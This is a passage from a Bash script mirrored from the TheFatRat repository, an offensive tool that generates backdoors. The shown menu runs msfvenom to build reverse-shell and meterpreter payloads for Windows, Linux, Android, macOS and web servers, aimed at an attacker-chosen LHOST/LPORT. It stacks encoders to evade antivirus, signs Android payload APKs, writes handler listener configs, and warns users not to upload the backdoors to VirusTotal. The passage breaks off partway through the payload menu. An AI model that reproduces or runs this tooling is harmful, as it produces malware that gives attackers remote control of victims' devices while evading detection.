deviloric
/
TheFatRat
mirror of https://github.com/Screetsec/TheFatRat.git
0
0
Fork 0
Code Releases Activity
TheFatRat/fatrat

3641 lines
136 KiB
Bash
Raw Blame History

#!/usr/bin/env bash
# THEFATRAT
#
# Welcome and dont disclaimer
# fatrat Author By Edo -maland- { screetec }
# Tested On , Backbox , kali Linux and Kali sana v.2
# contact me in screetsec@gmail.com or screetsec@dracos-linux.org
# DISTRO Penetration From Indonesia : https://dracos-linux.org/
# Easy tool for generate backdoor with msfvenom ( part of metasploit framework )
# and program compiles a C program with a meterpreter reverse_tcp payload In it that can then be executed on
# a windows host Program to create a C program after it is compiled that will bypass most AV
#
#WARNA KESUKAAN
cyan='\e[0;36m'
green='\e[0;34m'
okegreen='\033[92m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[0;33m'
BlueF='\e[1;34m' #Biru
RESET="\033[00m" #normal
orange='\e[38;5;166m'
#Accurate method to detect user Distro
lnx="Linux"
lsb_release -i > temp/distro.tmp
lsb_release -c > temp/codename.tmp
rlname=`awk '{print $2}' temp/codename.tmp`
dist=`awk '{print $3}' temp/distro.tmp`
dist1=`awk '{print $4}' temp/distro.tmp`
rm -f temp/codename.tmp >/dev/null
rm -f temp/distro.tmp >/dev/null
if [ "$dist" == "$lnx" ];
then
dist0=$dist1
else
dist0=$dist
fi
#SAMARAN TAMPAN
path=`pwd`
Versi=1.9.3
codename=Whistle
OS=`uname` #
distro=$dist0
disrov=$rlname
SERVICE=service;
apkembed='tools/apkembed.rb' # exec script path
pwned='python tools/pw_exec.py'
dave='python tools/trusted_2_6.py'
B='tools/prog.cs'
C='tools/dad.c'
apache='tools/apache.c'
paycom='output/payload.c'
pdfcom='output/pdf.c'
bcom='output/Program.cs'
pdfcom='output/pdf.c'
apachecom='output/apache_com.c'
out='output/ip.txt'
pump='tools/pump.py'
reverse1='temp/reverse1.c'
stag='temp/stag.c'
apkconfig=$path/config/apk.tmp
unzip=unzip
temp=$path/temp
file="config/config.path"
meterp="$path/temp/meterpreter.rc"
outf="app_backdoor.apk"
msploit=$path/logs/msploit.log
lanip=`ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1 -d'/'`
publicip=`dig +short myip.opendns.com @resolver1.opendns.com`
hostn=`host $publicip | awk '{print $5}' | sed 's/.$//'`
list=$path/config/listeners
log=$path/logs/apk-old.log
pwind=$path/logs/pwind.log
defcon=$path/config/conf.def
# spinner for Metasploit Generator
spinlong ()
{
bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ "
barlength=${#bar}
i=0
while ((i < 100)); do
n=$((i*barlength / 100))
printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
((i += RANDOM%5+2))
sleep 0.02
done
}
# spinner for random seed generator
spinlong2 ()
{
bar=" 01100111001001001110111001101010101010110101001010111001010101010101010"
barlength=${#bar}
i=0
while ((i < 100)); do
n=$((i*barlength / 100))
printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
((i += RANDOM%5+2))
sleep 0.02
done
}
function confdefault () {
clear
confd=$path/config/conf.def
if [ -f "$confd" ]
then
clear
echo -e $okegreen " "
echo "Fatrat detected that exists a default config file
with the following values :"
echo ""
lh=`sed -n 1p $confd`
lp=`sed -n 2p $confd`
echo "LHOST : $lh "
echo "LPORT : $lp "
echo ""
read -rsp $'Press any key go to options menu \n' -n 1 key
qt=$(zenity --list --radiolist --column "Select" --column "Action" TRUE "Change current config" FALSE "Delete configuration file" FALSE "Cancel" --text="Select one othe following options");
case $qt in
"Change current config")
rm -rf $confd
touch $confd
clear
val=$(zenity --forms --title="Config Defaults" --text="Change config" \
--add-entry="LHOST : " \
--add-entry="LPORT : ")
echo $val > temp/temp.tmp
tr "|" "\n" <temp/temp.tmp >$confd
rm temp/temp.tmp
echo -e $okegreen ""
read -rsp $'Configuration changed , Restart fatrat . Press any key to exit fatrat \n' -n 1 key
clear
exit 0
;;
"Delete configuration file")
clear
echo -e $okegreen ""
rm -rf $confd
echo "Default configuration file was deleted , you will now have
to input Lhost & Lport values manually in fatrat options ."
echo ""
read -rsp $'Press any key to return to fatrat menu\n' -n 1 key
clear
menu
;;
"Cancel")
clear
menu
;;
esac
else
echo -e $okegreen ""
echo "No default configuration file detected "
read -rsp $'Press any key to go to options \n' -n 1 key
nc=$(zenity --list --radiolist --column "Select" --column "Action" TRUE "Create config" FALSE "Cancel" --text="Select one othe following options");
case $nc in
"Create config")
confd=$path/config/conf.def
touch $confd
val=$(zenity --forms --title="Config Defaults" --text="Create config" \
--add-entry="LHOST : " \
--add-entry="LPORT : ")
echo $val > temp/temp.tmp
tr "|" "\n" <temp/temp.tmp >$confd
rm temp/temp.tmp
clear
echo -e $okegreen ""
read -rsp $'Configuration created , restart fatrat , Press any key to exit fatrat \n' -n 1 key
clear
exit 0
;;
"Cancel")
clear
menu
;;
esac
fi
}
valid_ip()
{
if [[ $yourip =~ ^[0-255]+\.[0-255]+\.[0-255]+\.[0-255]+$ ]]; then
echo ""
err=1
else
err=0
fi
}
#for checking if your command is correct
gboor ()
{
cat << !
Generate Backdoor
+------------++-------------------------++-----------------------+
| Name || Descript || Your Input
+------------++-------------------------++-----------------------+
| LHOST || The Listen Addres || $yourip
| LPORT || The Listen Ports || $yourport
| OUTPUTNAME || The Filename output || $fira
+------------++-------------------------++-----------------------+
!
}
#for checking if your command is correct when embed backdoor
gboor2 ()
{
cat << !
Generate Backdoor
+------------++-------------------------++-----------------------+
| Name || Descript || Your Input
+------------++-------------------------++-----------------------+
| LHOST || The Listen Addres || $yourip
| LPORT || The Listen Ports || $yourport
| OUTPUTNAME || The Filename output || $outf
+------------++-------------------------++-----------------------+
!
}
#Microsploit log file
msploitr ()
{
rm -rf $msploit >/dev/null 2>&1
touch $msploit
echo "**********************************************" > $msploit
echo "* Microsploit Log *" >> $msploit
echo "**********************************************" >> $msploit
echo " Metepreter Data " >> $msploit
echo "----------------------------------------------" >> $msploit
cat $meterp | while read LINE
do
echo $LINE >> $msploit
done
echo "----------------------------------------------" >> $msploit
echo " Xterm Output " >> $msploit
echo "----------------------------------------------" >> $msploit
}
#Checking
[[ `id -u` -eq 0 ]] || { echo -e $red "Must be root to run script"; exit 1; }
resize -s 33 84 > /dev/null
clear
#check config
if [ -f "$file" ]
then
msfconsole=`sed -n 14p $file`
msfvenom=`sed -n 15p $file`
backdoor=`sed -n 16p $file`
searchsploit=`sed -n 17p $file`
aapt=`sed -n 11p $file`
apktool=`sed -n 12p $file`
keytool=`sed -n 7p $file`
sign=`sed -n 5p $file`
else
echo -e $red"Configuration file does not exists , run setup.sh first for config ."
exit 1
fi
if [ -f "$defcon" ]
then
yourip=`sed -n 1p $defcon`
yourport=`sed -n 2p $defcon`
fi
#Jangan Nakal CTRL C MULU
trap ctrl_c INT
ctrl_c() {
clear
echo -e $red"[*] (Ctrl + C ) Detected, Trying To Exit ..."
sleep 1
echo ""
Stop
echo -e $red"[*] Stop all service , Wait ..."
sleep 1
echo ""
echo -e $yellow"[*] Thank You For Using TheFatRat =)."
echo ""
echo -e $yellow"[*] Check Dracos Linux LFS, Penetration OS From Indonesia =P."
exit
}
#########################
#CHECK DEPENDICIES
#########################
clear
echo -e $cyan" ____ _ _ _ "
echo " / ___| |__ ___ ___| | _(_)_ __ __ _ "
echo " | | | '_ \ / _ \/ __| |/ / | '_ \ / _\ | "
echo " | |___| | | | __/ (__| <| | | | | (_| | _ _ _ "
echo " \____|_| |_|\___|\___|_|\_\_|_| |_|\__/ | (_) (_) (_)"
echo " |___/ "
echo -e $lightgreen'-- -- +=[(c) 2016-2017 | dracos-linux.org | Linuxsec.org | Hacker Indonesia '
echo -e $cyan'-- -- +=[ Author: Screetsec < Edo Maland > ]=+ -- -- '
echo -e " "
if [ $(id -u) != "0" ]; then
echo [!]::[Check Dependencies] ;
sleep 2
echo []::[Check User]: $USER ;
echo []::[Distro]: $distro ;
echo []::[Release]: $rlname ;
sleep 1
echo [x]::[not root]: you need to be [root] to run this script.;
echo ""
sleep 1
exit
else
echo [!]::[Check Dependencies]: ;
sleep 1
echo []::[Distro]: $distro ;
echo []::[Release]: $rlname ;
echo []::[Check User]: $USER ;
fi
ping -c 1 google.com > /dev/null 2>&1
if [ "$?" != 0 ]
then
echo []::[Internet Connection]: DONE!;
echo [x]::[warning]: This Script Needs An Active Internet Connection;
sleep 2
else
echo []::[Internet Connection]: connected!;
sleep 2
fi
# check apache if exists
which apache2 > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo []::[Apache2 Server $distro ]: installation found!;
else
echo [x]::[warning]:this script require apache2 to work ;
echo ""
echo [!]::Run setup.sh to install apache2 ;
echo ""
sleep 2
exit 1
fi
sleep 2
# check if ruby exists
which ruby > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo []::[Ruby]: installation found!;
else
echo [x]::[warning]:this script require ruby to work ;
echo ""
echo [!]::Run setup.sh to install ruby ;
echo ""
sleep 2
exit 1
fi
sleep 2
# check if apktool exists
which $apktool > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo []::[Apktool]: installation found!;
else
echo [x]::[warning]:this script require apktool to work ;
echo ""
echo [!]::Run setup.sh to install apktool ;
echo ""
sleep 2
exit 1
fi
sleep 2
# check if aapt exists
which $aapt > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo []::[Aapt]: installation found!;
else
echo [x]::[warning]:this script require aapt to work ;
echo ""
echo [!]::Run setup.sh to install aapt ;
echo ""
sleep 2
exit 1
fi
sleep 2
#another apache2 locate
if [ "$distro" = "Ubuntu" ]; then
apache2="/var/www"
elif [ "$distro" = "Kali" ]; then
apache2="/var/www/html"
elif [ "$distro" = "BackBox" ]; then
apache2="/var/www/html"
else
apache2="/var/www/html"
fi
# check msfconsole
which $msfconsole > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo []::[Msfconsole]: installation found!;
else
echo [x]::[warning]:this script require msfconsole installed to work ;
echo ""
echo [!]::Run setup.sh to install metasploit-framework ;
sleep 3
exit 1
fi
sleep 2
# check if msfvenom exists
which $msfvenom > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo []::[Msfvenom]: installation found!;
else
echo [x]::[warning]:this script require msfvenom installed to work ;
echo ""
echo [!]::Run setup.sh to install metasploit-framework ;
sleep 3
exit 1
fi
sleep 2
# check zenity if exists
which zenity > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo []::[Zenity]: installation found!;
else
echo [x]::[warning]:this script require zenity installed to work ;
echo ""
echo [!]::Run setup.sh to install zenity ;
echo ""
sleep 2
exit 1
fi
sleep 2
# check mingw if exists
which i586-mingw32msvc-gcc > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo []::[Mingw32 OR 64]: installation found!;
COMPILER="i586-mingw32msvc-gcc"
else
which i686-w64-mingw32-gcc > /dev/null 2>&1
if [ $? -eq 0 ]; then
echo []::[Mingw32]: installation found!;
COMPILER="i686-w64-mingw32-gcc"
else
echo [x]::[warning]:this script require mingw32 or 64 installed to work ;
echo ""
echo [!]::Run setup.sh to install ming32 ;
sleep 2
exit 1
fi
fi
sleep 2
# check backdoor-factory if exists
which $backdoor > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo []::[Backdoor-factory]: installation found!;
else
echo [x]::[warning]:this script require backdoor-factory installed to work ;
echo ""
echo [!]::Run setup.sh to install backdoor-factory ;
echo ""
sleep 2
exit 1
fi
sleep 2
# check monodevelop if exists
which monodevelop > /dev/null 2>&1
which dmcs > /dev/null 2>&1
if [ -d $find ]; then
echo []::[Monodevelop]: installation found!;
else
echo [x]::[warning]:this script require monodevelop to work ;
echo ""
echo [!]::Run setup.sh to install monodevelop ;
echo ""
sleep 2
exit 1
fi
sleep 2
# check xterm if exists
which xterm > /dev/null 2>&1
if [ -d $find ]; then
echo []::[Xterm]: installation found!;
else
echo [x]::[warning]:this script require xterm to work ;
echo ""
echo [!]::Run setup.sh to install xterm ;
echo ""
sleep 2
exit 1
fi
# check gnome-terminal if exists
which gnome-terminal > /dev/null 2>&1
if [ -d $find ]; then
echo []::[Gnome-terminal]: installation found!;
else
echo [x]::[warning]:this script require gnome-terminal to work ;
echo ""
echo [!]::Run setup.sh to install gnome-terminal ;
echo ""
sleep 2
exit 1
fi
# check upx if exists
which upx > /dev/null 2>&1
if [ -d $find ]; then
echo []::[Upx]: installation found!;
else
echo [x]::[warning]:this script require upx to work ;
echo ""
echo [!]::Run setup.sh to install upx ;
echo ""
sleep 2
exit 1
fi
#WARNING !!!
resize -s 33 68 > /dev/null
clear
echo -e $red""
echo " ";
echo "=================================================================="
echo " WARNING ! WARNING ! WARNING ! WARNING ! WARNING ! "
echo " YOU CAN UPLOAD OUTPUT/BACKDOOR FILE TO WWW.NODISTRIBUTE.COM "
echo "=================================================================="
echo " ____ _____ _____ _____ _____ _____ __ _____ _____ ____ ";
echo "| \| | | |_ _| | | | _ | | | | _ | \ ";
echo "| | | | | | | | | | | | | __| |__| | | | | | ";
echo "|____/|_____|_|___| |_| |_____|__| |_____|_____|__|__|____/ ";
echo " _____ _____ ";
echo " |_ _| | ";
echo " | | | | | ";
echo " |_| |_____| ";
echo " _____ _____ _____ _____ _____ _____ _____ _____ _____ __ ";
echo "| | | | __ | | | __| |_ _| |_ _| _ | | ";
echo "| | |- -| -| | |__ | | | | | | | | | | |__ ";
echo " \___/|_____|__|__|_____|_____| |_| |_____| |_| |__|__|_____| ";
echo "=================================================================="
echo " PLEASE DON'T UPLOAD BACKDOOT TO WWW.VIRUSTOTAL.COM "
echo " YOU CAN UPLOAD OUTPUT/BACKDOOR FILE TO WWW.NODISTRIBUTE.COM "
echo "=================================================================="
echo ""
echo -n "Press any key to continue .............."
read warning
##############################
#CHECKING POSTGRESQL
#############################
if ps ax | grep -v grep | grep postgresql > /dev/null
then
clear
resize -s 33 84 > /dev/null
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo -e $white":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo -e $lightgreen""
echo " ___________ _ _______________ ___ __ ___ ___ _______ _______";
echo " / __/ __/ _ \ | / / _/ ___/ __/ / _ \/ / / / |/ / |/ / _/ |/ / ___/";
echo " _\ \/ _// , _/ |/ // // /__/ _/ / , _/ /_/ / / // // / (_ / ";
echo "/___/___/_/|_||___/___/\___/___/ /_/|_|\____/_/|_/_/|_/___/_/|_/\___/ ";
echo " ";
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo -e $white":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
sleep 2
else
resize -s 33 73 > /dev/null
clear
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo -e $white"::::::::::::::::::::$white "Metasploit service is not running"$white ::::::::::::::::::"
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo ""
echo -e $white " /) "
echo " // "
echo " (( "
echo " // "
echo " .-. // .-. "
echo " / \- ((=-/ \ "
echo " \ \ / "
echo " -( ___ ))__)- "
echo " .-' // '-. "
echo " / (( \ "
echo " | * | "
echo " \ / "
echo " \ |_w_| / "
echo " _) \ / (_ "
echo " jgs (((---' '---))) "
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo -e $white":::::::::::::::: Wait for starting a Service Postgresql ::::::::::::::::"
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
fi
#Started Service postgresql & apache
if [ "$distro" = "Kali" ]; then
/etc/init.d/postgresql start > /dev/null 2>&1
/etc/init.d/metasploit start > /dev/null 2>&1
/etc/init.d/apache2 start > /dev/null 2>&1
else
/etc/init.d/postgresql start > /dev/null 2>&1
/etc/init.d/metasploit start > /dev/null 2>&1
/etc/init.d/apache2 start > /dev/null 2>&1
fi
read -p "Press [Enter] key to Continue..."
clear
function Stop() {
#Stoped Service postgresql & apache
if [ "$distro" = "Kali" ]; then
/etc/init.d/postgresql stop > /dev/null 2>&1
/etc/init.d/metasploit stop > /dev/null 2>&1
/etc/init.d/apache2 stop > /dev/null 2>&1
else
/etc/init.d/metasploit stop > /dev/null 2>&1
/etc/init.d/apache2 stop > /dev/null 2>&1
/etc/init.d/postgresql stop > /dev/null 2>&1
fi
}
function cmsfvenom() {
clear
echo -e $okegreen" ===================================================================== "
echo -e " | $cyan Create Payload with msfvenom ( must install msfvenom ) $okegreen | "
echo -e $okegreen" ===================================================================== "
echo -e $red" ___________ "
echo -e " | |======[*** $yellow ____ _ "
echo -e $red" | $yellow MSFVENOM $red \ $yellow / ___|_ __ ___ ____| |_ ___ _ __ "
echo -e $red" |_____________\_______ $yellow | | | '__/ _ \/ _ | __/ _ \| '__|"
echo -e $red" |==[v1.2 >]===========\ $yellow | |___| | | __/ (_| | || (_) | | "
echo -e $red" |______________________\ $yellow \____|_| \___|\____|\__\___/|_| "
echo -e $yellow" \(@)(@)(@)(@)(@)(@)(@)/ "
echo -e $red" ********************* "
echo ""
echo -e $okegreen" ===================================================================== "
echo -e " | $cyan Created by $red Edo Maland ( Screetsec ) $okegreen | "
echo -e $okegreen" ===================================================================== "
echo ""
echo -e $okegreen " [1] LINUX >> FatRat.elf"
echo -e " [2] WINDOWS >> FatRat.exe"
echo -e " [3] SIGNED ANDROID >> FatRat.apk"
echo -e " [4] MAC >> FatRat.macho"
echo -e " [5] PHP >> FatRat.php"
echo -e " [6] ASP >> FatRat.asp"
echo -e " [7] JSP >> FatRat.jsp"
echo -e " [8] WAR >> FatRat.war"
echo -e " [9] Python >> FatRat.py "
echo -e " [10] Bash >> FatRat.sh"
echo -e " [11] Perl >> FatRat.pl"
echo -e " [12] doc >> Microsoft.doc "$yellow"( not macro attack )"
echo -e $okegreen" [13] rar >> bacdoor.rar "$yellow"( Winrar old version)"
echo -e $okegreen" [14] Back to Menu "
echo -e " "
echo -e $okegreen" ┌─["$red"TheFatRat$okegreen]──[$red~$okegreen]─["$yellow"creator$okegreen]:"
echo -ne $okegreen" └─────► " ;tput sgr0
read fatrat1
if test $fatrat1 == '1'
then
echo ""
spinlong
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
echo -e $okegreen""
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
read -p ' Please enter the base name for output files : ' fira
payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "linux/ppc/shell_reverse_tcp" FALSE "linux/x86/shell_reverse_tcp" FALSE "linux/x86/meterpreter/reverse_tcp" FALSE "osx/armle/shell_reverse_tcp" FALSE "osx/ppc/shell_reverse_tcp" FALSE "bsd/x86/shell/reverse_tcp" FALSE "solaris/x86/shell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1
spinlong
echo ""
echo ""
gboor
spinlong
echo ""
echo ""
$msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f elf > output/$fira.elf
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '2'
then
echo ""
spinlong
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
read -p ' Please enter the base name for output files : ' fira
payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" FALSE "windows/powershell_bind_tcp" FALSE "windows/powershell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1
echo ""
echo ""
gboor
spinlong
echo ""
echo ""
$msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f raw -e x86/shikata_ga_nai -i 10 | $msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | $msfvenom -a x86 --platform windows -e x86/jmp_call_additive -i 1| $msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 1 | $msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 1 -f exe -o output/$fira.exe
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '3'
then
echo ""
spinlong
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
read -p ' Please enter the base name for output files : ' fira
payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1
echo ""
echo ""
gboor
spinlong
echo ""
echo -e $okegreen ""
echo "[*] Creating RAT payload with msfvenom"
sleep 1
$msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $path/backdoored/$fira.apk >>$log /dev/null 2>&1
outapk=$path/backdoored/$fira.apk
if [ ! -f "$outapk" ]
then
echo -e $red ""
echo "There was a problem in the creation of your rat apk file , make sure your metasploit is running correctly"
echo -e $okegreen ""
read -rsp $'Press any key to return to fatrat menu\n' -n 1 key
clear
menu
fi
echo "[✔] Done!"
echo "[*] Creating a Valid Certificate"
sleep 1
#Creating certificate and storing info in logfile
$keytool -genkey -v -keystore $path/temp/debug.keystore -storepass android -alias androiddebugkey -keypass android -dname "CN=Android Debug,O=Android,C=US" -keyalg RSA -keysize 2048 -validity 10000 >>$log 2>&1
cerapk=$path/temp/debug.keystore
if [ ! -f "$cerapk" ]
then
echo -e $red ""
echo "There was a problem creating a valid certificate ."
echo -e $okegreen ""
read -rsp $'Press any key to return to fatrat menu\n' -n 1 key
clear
menu
fi
echo "[✔] Done!"
echo "[*] Signing your payload APK"
sleep 1
$sign -verbose -keystore $path/temp/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA $path/backdoored/$fira.apk androiddebugkey >>$log 2>&1
echo "[✔] Done!"
rm $path/temp/debug.keystore
sleep 1
echo ""
zenity --question --text="`printf "Do you want to create a listener for this configuration \n to use in msfconsole in future ?"`"
if [ $? = 0 ] ; then
save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="payloadapk");
svf=$path/config/listeners/$save.rc
rm -rf $svf >/dev/null 2>&1
echo "use exploit/multi/handler" > $svf
echo "set PAYLOAD $payload" >> $svf
echo "set LHOST $yourip" >> $svf
echo "set LPORT $yourport" >> $svf
echo "exploit -j" >> $svf
echo -e $okegreen ""
echo "Configuration file saved to $list/$save.rc"
fi
echo -e $yellow ""
echo "Your payload apk was created and signed , and it is located in :
$path/backdoored/$fira.apk"
echo -e $okegreen ""
read -rsp $'Press any key to return to fatrat menu\n' -n 1 key
clear
menu
elif test $fatrat1 == '4'
then
echo ""
spinlong
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
read -p ' Please enter the base name for output files : ' fira
spinlong
echo ""
echo ""
gboor
spinlong
echo ""
echo ""
$msfvenom -p osx/x86/shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f macho > output/$fira.macho
echo -e "Shell Saved To outputFolder "
elif test $fatrat1 == '5'
then
echo ""
spinlong
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
read -p ' Please enter the base name for output files : ' fira
spinlong
echo ""
echo ""
gboor
spinlong2
echo ""
echo ""
$msfvenom -p php/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.php
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '6'
then
echo ""
spinlong
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
read -p ' Please enter the base name for output files : ' fira
spinlong
echo ""
echo ""
gboor
spinlong2
echo ""
echo ""
$msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f asp > output/$fira.asp
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '7'
then
echo ""
spinlong
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
read -p ' Please enter the base name for output files : ' fira
spinlong
echo ""
echo ""
gboor
spinlong2
echo ""
echo ""
$msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f raw > output/$fira.jsp
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '8'
then
echo ""
spinlong
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
read -p ' Please enter the base name for output files : ' fira
spinlong
echo ""
echo ""
gboor
spinlong2
echo ""
echo ""
$msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f war > output/$fira.war
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '9'
then
echo ""
spinlong
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
read -p ' Please enter the base name for output files : ' fira
spinlong
echo ""
echo ""
gboor
spinlong2
echo ""
echo ""
$msfvenom -p cmd/unix/reverse_python LHOST=$yourip LPORT=$yourport -f raw > output/$fira.py
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '10'
then
echo ""
spinlong
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
read -p ' Please enter the base name for output files : ' fira
spinlong
echo ""
echo ""
gboor
spinlong2
echo ""
echo ""
$msfvenom -p cmd/unix/reverse_bash LHOST=$yourip LPORT=$yourport -f raw > output/$fira.sh
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '11'
then
echo ""
spinlong
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
read -p ' Please enter the base name for output files : ' fira
